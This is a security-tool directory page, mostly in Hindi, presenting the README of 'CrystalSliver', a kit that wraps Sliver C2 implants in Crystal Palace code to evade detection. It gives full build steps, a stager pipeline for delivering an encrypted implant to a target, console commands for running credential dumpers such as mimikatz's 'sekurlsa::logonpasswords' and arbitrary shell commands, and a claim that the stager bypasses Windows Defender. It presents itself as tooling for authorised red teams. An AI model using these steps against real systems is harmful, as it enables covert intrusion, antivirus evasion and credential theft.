Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CrystalSliver — Sliver के लिए Crystal Palace एवेज़न किट | Kitploit
उपकरण/GitHubGitHub/licitrasimone/crystalsliver
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिशोषण फ्रेमवर्कस्थायित्व तंत्रआईडीएस/आईपीएस से बचनापार्श्व आंदोलनशेलकोडपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगशेलकोड जनरेशनपेलोड डेवलपमेंट
1081472 महीने पहलेKitploit द्वारा समीक्षित
GitHublicitrasimone/crystalsliver

CrystalSliver

Sliver के लिए Crystal Palace एवेज़न किट

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

crystal-kit-sliver

Crystal Palace evasion किट Sliver C2 पर पोर्ट की गई।

यह rasta-mouse के Crystal-Kit (Cobalt Strike) का Sliver के लिए पहला सार्वजनिक पोर्ट है। यह Crystal-Kit-Xenon (Mythic) द्वारा सिद्ध उसी cross-C2 पैटर्न का अनुसरण करता है।

  • लाइसेंस: MIT — कॉपीराइट (c) 2026 Simone Licitra
  • लक्ष्य: केवल Windows x64 (अपस्ट्रीम बाधा)
  • स्थिति: अंत-से-अंत सत्यापित — Kali बिल्ड पाइपलाइन + Windows 10 x64 FLARE-VM runtime। Sliver सत्र स्थापित।

यह क्या करता है

Sliver के डिफ़ॉल्ट reflective loader और post-ex निष्पादन पथ को Crystal Palace (Raphael Mudge, BSD) से प्रतिस्थापित करता है। परिणाम एक position-independent code (PICO) blob है जो निम्न को बंडल करता है:

  • ror13 हैश-आधारित API रिज़ॉल्यूशन (सादे LoadLibrary / GetProcAddress के बिना)
  • VirtualAlloc / VirtualProtect / VirtualFree / पर IAT हुक
LoadLibraryA
  • callbacks के दौरान Draugr call stack स्पूफिंग
  • एम्बेडेड DLL पर XOR sleep mask
  • libtcg-आधारित runtime ऑब्फ़स्केशन
  • Sliver implant DLL (या कोई भी post-ex DLL) PICO के अंदर XOR-मास्क होता है और निष्पादन के समय केवल मेमोरी में अनमास्क किया जाता है।


    दो उपयोग मामले

    A — Implant evasion (प्राथमिक)

    कच्चा Sliver implant DLL लक्ष्य पर सीधे कभी निष्पादित नहीं होता। इसके बजाय इसे Crystal Palace के साथ एक PICO में लपेटा जाता है, AES-256-CBC एन्क्रिप्ट किया जाता है, और एक कस्टम stager (~17 KB) के साथ डिलीवर किया जाता है जो इसे मेमोरी में डिक्रिप्ट व निष्पादित करता है।

    root@kitploit:~
    sliver-server generate --format shared → impl.dll
            │
            ▼
    generate-implant.sh --dll impl.dll → sliver.crystal.bin  (~110 KB PICO)
            │
            ▼
    bundle-stager.sh                   → csvchelper.exe (~17 KB, no embedded payload)
                                       → payload.dat    (~36 MB AES-256-CBC ciphertext)
            │
            ▼ deliver BOTH files to same directory on target
            ▼
    Windows VM: csvchelper.exe
            │
            ▼ BCrypt AES-256-CBC decrypt payload.dat → PICO in RW memory
            ▼ VirtualProtect(RX) → CreateThread → Crystal Palace entry
            ▼ register .pdata → TLS callbacks → DllMain → StartW() → beacon goroutine → HTTP session
    

    B — Post-ex evasion (द्वितीयक)

    एक बार सत्र सक्रिय हो जाने पर, Sliver Extension के माध्यम से Crystal Palace के जरिए संवेदनशील DLL (recon, credential dumpers, आदि) चलाएँ।

    root@kitploit:~
    sliver > extensions install crystal-loader-0.1.0.tar.gz
    sliver > crystal --payload C:/path/mimikatz.pico.bin
    

    पुनर्निर्माण (rebuild) के बिना runtime args पास करने के लिए उन्हें | के बाद जोड़ें:

    root@kitploit:~
    sliver > crystal --payload C:/path/file.pico.bin|args here
    

    crystal-loader.x64.dll एक Sliver DLL Extension है जो PICO blob को डिस्क से VirtualAlloc(RW) क्षेत्र में पढ़ता है, VirtualProtect के साथ इसे RX में बदलता है, और Crystal Palace entrypoint पर जाता है। कभी भी PAGE_EXECUTE_READWRITE मैपिंग नहीं रखी जाती। पथ forward slashes का उपयोग करते हैं। Arg प्रारूप type:string है (BOF binary नहीं)। DLL को Sliver द्वारा मेमोरी में लोड किया जाता है — इसे लक्ष्य डिस्क पर फ़ाइल के रूप में नहीं लिखा जाता।

    C — Crystal Palace के माध्यम से बिल्ट-इन shell निष्पादन

    crystal-exec उसी extension में बंडल किया गया दूसरा कमांड है। यह extension DLL में सीधे एम्बेडेड PICO का उपयोग करके Crystal Palace evasion के माध्यम से मनमाने shell कमांड चलाता है — अपलोड करने के लिए कोई PICO फ़ाइल नहीं।

    root@kitploit:~
    sliver > crystal-exec --cmd "whoami /all"
    

    आउटपुट पाइप के माध्यम से मौजूदा Sliver सत्र पर ऑपरेटर को लौटाया जाता है। जब आपको पूर्ण post-ex DLL की आवश्यकता नहीं होती, तो यह एकल (one-off) shell कमांड के लिए सबसे तेज़ तरीका है।


    रिपॉजिटरी लेआउट

    root@kitploit:~
    crystal-kit-sliver/
    ├── loader/              ← Reflective loader sources (Use case A) — verbatim from Crystal-Kit
    ├── postex-loader/       ← Post-ex loader sources (Use case B) — Crystal-Kit + Xenon patch
    ├── libtcg.x64.zip       ← Upstream binary dependency (kept in tree for build convenience)
    └── sliver-glue/         ← Sliver-specific build glue
        ├── extension.json           Sliver Extension manifest
        ├── generate.sh              Wrap a post-ex DLL  → PICO (Use case B)
        ├── generate-implant.sh      Wrap a Sliver DLL   → PICO (Use case A)
        ├── bundle-implant.sh        Bundle PICO + Crystal Palace demo stager into drop.zip (legacy)
        ├── bundle-stager.sh         Build custom stager: csvchelper.exe + payload.dat (primary)
        ├── pack-extension.sh        Pack DLL + manifest into Sliver Extension tarball
        ├── Makefile                 make objects / package / clean
        ├── stager/                  Custom stager sources (AES-256-CBC, asInvoker manifest)
        └── wrapper/                 crystal-loader.c (BOF-compat DLL wrapper)
    
    docs/
    ├── RUNBOOK.md           Step-by-step Kali → Windows lab procedure
    ├── PORTING_MAP.md       File-by-file mapping Crystal-Kit → this repo + literal diffs
    └── TOOLCHAIN.md         Build prerequisites and pipeline details
    

    त्वरित बिल्ड (Kali / Debian / Ubuntu)

    root@kitploit:~
    # 1. Toolchain
    sudo apt install -y mingw-w64 nasm openjdk-17-jdk make zip git curl
    
    # 2. Crystal Palace dist (BSD-3-Clause, Raphael Mudge)
    mkdir -p external/crystalpalace
    curl -fsSL https://tradecraftgarden.org/download/cpdist-latest.tgz \
       | tar -xz -C external/crystalpalace/
    export CRYSTAL_PALACE_HOME=$(pwd)/external/crystalpalace/dist
    
    # 3. Build everything
    make -C crystal-kit-sliver/loader all
    make -C crystal-kit-sliver/postex-loader all
    make -C crystal-kit-sliver/sliver-glue/wrapper all
    make -C crystal-kit-sliver/sliver-glue/wrapper smoketest
    make -C crystal-kit-sliver/sliver-glue/crystal-exec all
    
    # 4. Use case A — wrap a Sliver implant and build the stager
    ./crystal-kit-sliver/sliver-glue/generate-implant.sh --dll /path/to/sliver-impl.dll \
       crystal-kit-sliver/sliver-glue/build/sliver.crystal.bin
    ./crystal-kit-sliver/sliver-glue/bundle-stager.sh \
       crystal-kit-sliver/sliver-glue/build/sliver.crystal.bin \
       crystal-kit-sliver/sliver-glue/build/csvchelper.exe
    # → produces build/csvchelper.exe + build/payload.dat (deliver both to target)
    
    # 5. Use case B — wrap a post-ex DLL (postex.sh handles naming and prints the sliver command)
    ./crystal-kit-sliver/sliver-glue/postex.sh /path/to/postex.dll
    # With baked-in args:  postex.sh /path/to/postex.dll "sekurlsa::logonpasswords exit"
    ./crystal-kit-sliver/sliver-glue/pack-extension.sh
    
    # 6. crystal-exec — rebuild the built-in command executor (only needed after modifying crystalexec.c)
    cd crystal-kit-sliver/sliver-glue/crystal-exec && make && cd -
    ./crystal-kit-sliver/sliver-glue/pack-extension.sh
    

    पूर्ण ऑपरेटर प्रक्रिया के लिए docs/RUNBOOK.md देखें (Sliver इंस्टॉल, listener सेटअप, लक्ष्य निष्पादन, समस्या निवारण)।


    क्या सत्यापित किया गया है

    आइटमस्थितिसाक्ष्य
    सभी Crystal-Kit स्रोत MinGW 15.2 + NASM 3.01 के तहत संकलित होते हैंOKmake all क्लीन, प्रति loader 8 .o + 1 .bin
    Xenon post-ex पैच मौजूदOKdfr "ror13", _DLLARGS_ सेक्शन, DLL_PROCESS_ATTACH में dll_arguments पैरामीटर
    Crystal Palace CLI सत्यापितOK./link <spec> <dll> <out.bin> [%KEY=value] — पोज़िशनल, dist/README में प्रलेखित
    अंत-से-अंत PICO बिल्ड (उपयोग मामला A)OKपरीक्षण DLL से 117 KB PICO निर्मित
    अंत-से-अंत PICO बिल्ड (उपयोग मामला B)OKpostex-loader/loader.spec के माध्यम से 111 KB PICO निर्मित
    Sliver Extension wrapper DLL बिल्डOKcrystal-loader.x64.dll ~42 KB, crystal-exec.x64.dll ~75 KB — दोनों PE32+ Initialize सिंबल निर्यात करते हैं; कोई RWX नहीं; stripped
    Extension tarball सही ढंग से पैक होता हैOK37 KB tarball को tar -tzf से मान्य किया गया
    कस्टम stager बिल्ड (दो-फ़ाइल डिलीवरी)OKbundle-stager.sh → csvchelper.exe (17 KB, entropy 4.784) + payload.dat (AES-256-CBC)
    Windows पर runtime निष्पादन (उपयोग मामला A)OKWindows 10 x64 FLARE-VM पर Sliver सत्र स्थापित; stager Defender (Wacatac.B!ml + ZomBytes.B) को पार करता है
    Windows पर runtime निष्पादन (उपयोग मामला B)OKcrystal --payload C:/path/file.pico.bin — post-ex PICO के माध्यम से नया Sliver सत्र स्थापित; arg प्रारूप type:string के रूप में सत्यापित, forward slash पथ
    crystal-exec कमांडOKShell कमांड आउटपुट पाइप के माध्यम से ऑपरेटर को लौटाया गया; PICO extension DLL में एम्बेडेड, कोई अपलोड आवश्यक नहीं

    निर्भरताएँ

    निर्भरतालाइसेंसकैसे प्राप्त करेंबंडल किया गया?
    Crystal Palace (crystalpalace.jar, link, आदि)BSD-3-Clause, (c) 2025 Raphael Mudge / AFF-WGcurl -O https://tradecraftgarden.org/download/cpdist-latest.tgzनहीं (.gitignore external/ को बाहर करता है)
    libtcg.x64.zipUpstream बाइनरी, लाइसेंस अघोषित (संभवतः QEMU TCG-व्युत्पन्न)Upstream Crystal-Kit रिपॉजिटरी से कॉपी किया गयाहाँ, बिल्ड सुविधा के लिए ट्री में रखा गया
    Sliver C2GPLv3https://sliver.shनहीं — केवल runtime निर्भरता
    MinGW-w64 + NASMGPL-संगतapt install या brew installनहीं

    यह रिपॉजिटरी crystalpalace.jar का पुनर्वितरण नहीं करती। बिल्ड पाइपलाइन इसे बाहरी रूप से प्राप्त करती है और CRYSTAL_PALACE_HOME पर्यावरण चर के माध्यम से इसका संदर्भ देती है।


    श्रेय

    सभी upstream कॉपीराइट और लाइसेंसों की पूरी सूची के लिए NOTICE.md देखें। संक्षिप्त सारांश:

    • rasta-mouse — Crystal-Kit (MIT) — आधार reflective loader, postex loader, spec फ़ाइलें
    • nickswink — Crystal-Kit-Xenon (MIT) — cross-C2 पैच टेम्पलेट (smart pointers हटाना + dll_args सेक्शन)
    • Raphael Mudge / AFF-WG — Crystal Palace (BSD-3-Clause) — linker और PIC टूलिंग
    • TrustedSec — COFFLoader (BSD-3-Clause) — BOF संगतता परत (beacon.h, beacon_compatibility.c/h)
    • BishopFox — Sliver C2 (GPLv3) — लक्ष्य फ्रेमवर्क

    रोडमैप

    • 1 — Upstream रिपॉजिटरी की ऑडिट करना + Crystal-Kit और Crystal-Kit-Xenon के बीच diff निकालना
    • 2 — Toolchain दस्तावेज़ीकरण + रिपॉजिटरी स्कैफोल्ड
    • 3 — शाब्दिक diffs के साथ फ़ाइल-दर-फ़ाइल पोर्टिंग मानचित्र (docs/PORTING_MAP.md)
    • 4 — स्रोत कॉपी किए गए + Xenon पैच लागू + LICENSE + NOTICE
    • 5 — sliver-glue/ glue स्क्रिप्ट और Extension मैनिफेस्ट
    • 6a — DLL wrapper लिखा गया, बिल्ड किया गया (MinGW 15.2), पैक किया गया, smoke test shellcode
    • 6b — Crystal Palace CLI सत्यापित, वास्तविक PICO अंत-से-अंत बिल्ड किया गया
    • 6c — दोहरा उपयोग मामला A/B: generate-implant.sh + bundle-implant.sh
    • 6d — Windows x64 लैब पर runtime परीक्षण — उपयोग मामला A सत्यापित (FLARE-VM पर Sliver सत्र स्थापित)
    • 6e — उपयोग मामला B runtime सत्यापित (crystal --payload काम करता है, arg प्रारूप type:string पर तय, forward slash पथ)
    • 6f — crystal-exec कमांड: Crystal Palace के माध्यम से बिल्ट-इन post-ex shell निष्पादन (कोई अपलोड आवश्यक नहीं)
    • 6g — पुनर्निर्माण के बिना गतिशील DLL args के लिए | विभाजक के माध्यम से runtime args

    अस्वीकरण

    आक्रामक सुरक्षा टूलिंग अधिकृत red team अभियानों, प्रयोगशाला अनुसंधान और शिक्षा के लिए अभिप्रेत है। केवल उन वातावरणों में उपयोग करें जहाँ आपके पास लिखित प्राधिकरण हो। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता।

    टूल डाउनलोड करें